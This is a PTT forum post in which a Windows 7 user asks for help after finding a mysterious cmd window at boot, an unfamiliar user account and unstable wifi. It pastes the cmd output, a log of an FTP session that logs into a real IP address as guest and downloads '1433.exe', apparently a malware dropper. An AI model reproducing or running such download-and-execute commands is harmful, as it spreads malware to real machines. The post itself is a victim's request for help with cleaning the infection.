-- 更新，修正後掃描的紀錄 http://0rz.tw/UKKJQ 現在wifi 好像還是有點斷斷的， 而且為什麼會多一個網路出來(如圖) orz... https://www.dropbox.com/s/buvu8jtpybs0dtc/sshot-1.jpg cmd好像也沒有再跑出來了 -- 1. 敘述問題：最近發現電腦怪怪，連不上家裡分享器的wifi， 開機的時候會跑出一個cmd， 然後剛剛發現有被建立一個奇怪的windows使用者， 以下是cmd裡的內容： ---- 尚未啟動 Internet Connection Sharing (ICS) 服務。 詳細資料，請輸入 NET HELPMSG 3521。 ftp> open 221.214.12.243 已連線到 221.214.12.243。 220 Microsoft FTP Service 使用者 (221.214.12.243:(none)): 331 Password required for guest. 230 User guest logged in. ftp> binary 200 Type set to I. ftp> get 1433.exe 200 PORT command successful. 150 Opening BINARY mode data connection for 1433.exe(634880 bytes). 226 Transfer complete. ftp: 634880 位元組已接收，時間: 13.54秒數 46.90KB/sec。 ftp> bye 221 open 221.214.12.243 220 Microsoft FTP Service 331 Password required for guest. 230 User guest logged in. binary 200 Type set to I. get 1433.exe 200 PORT command successful. 150 Opening BINARY mode data connection for 1433.exe(634880 bytes). 226 Transfer complete. 16.4838.51bye 221 ---- 目前已經用卡巴6.0全機掃朴過也刪除幾個可能的木馬了， 也用了SREng， wifi似乎也正常了， 不過開機的CMD程序還是在，啟動那邊也看不到東西。 2. 系統資料：Windows 7 64 bit 防毒是卡巴6.0 3. 分析報告： Combofix報告： http://sun.cis.scu.edu.tw/~92a39/upload/.txt 其他的我不太會用上傳系統，上船的網址都一樣， 我把其他放在Dropbox的壓縮檔裡，不好意思 請包涵 http://ppt.cc/2NSs 以上，麻煩版上大大救援，謝謝 -- ※ 發信站: 批踢踢實業坊(ptt.cc) ◆ From: 1.160.123.93 ※ 編輯: victor0218 來自: 1.160.123.93 (11/30 21:56) ※ 編輯: victor0218 來自: 1.160.123.93 (11/30 21:59)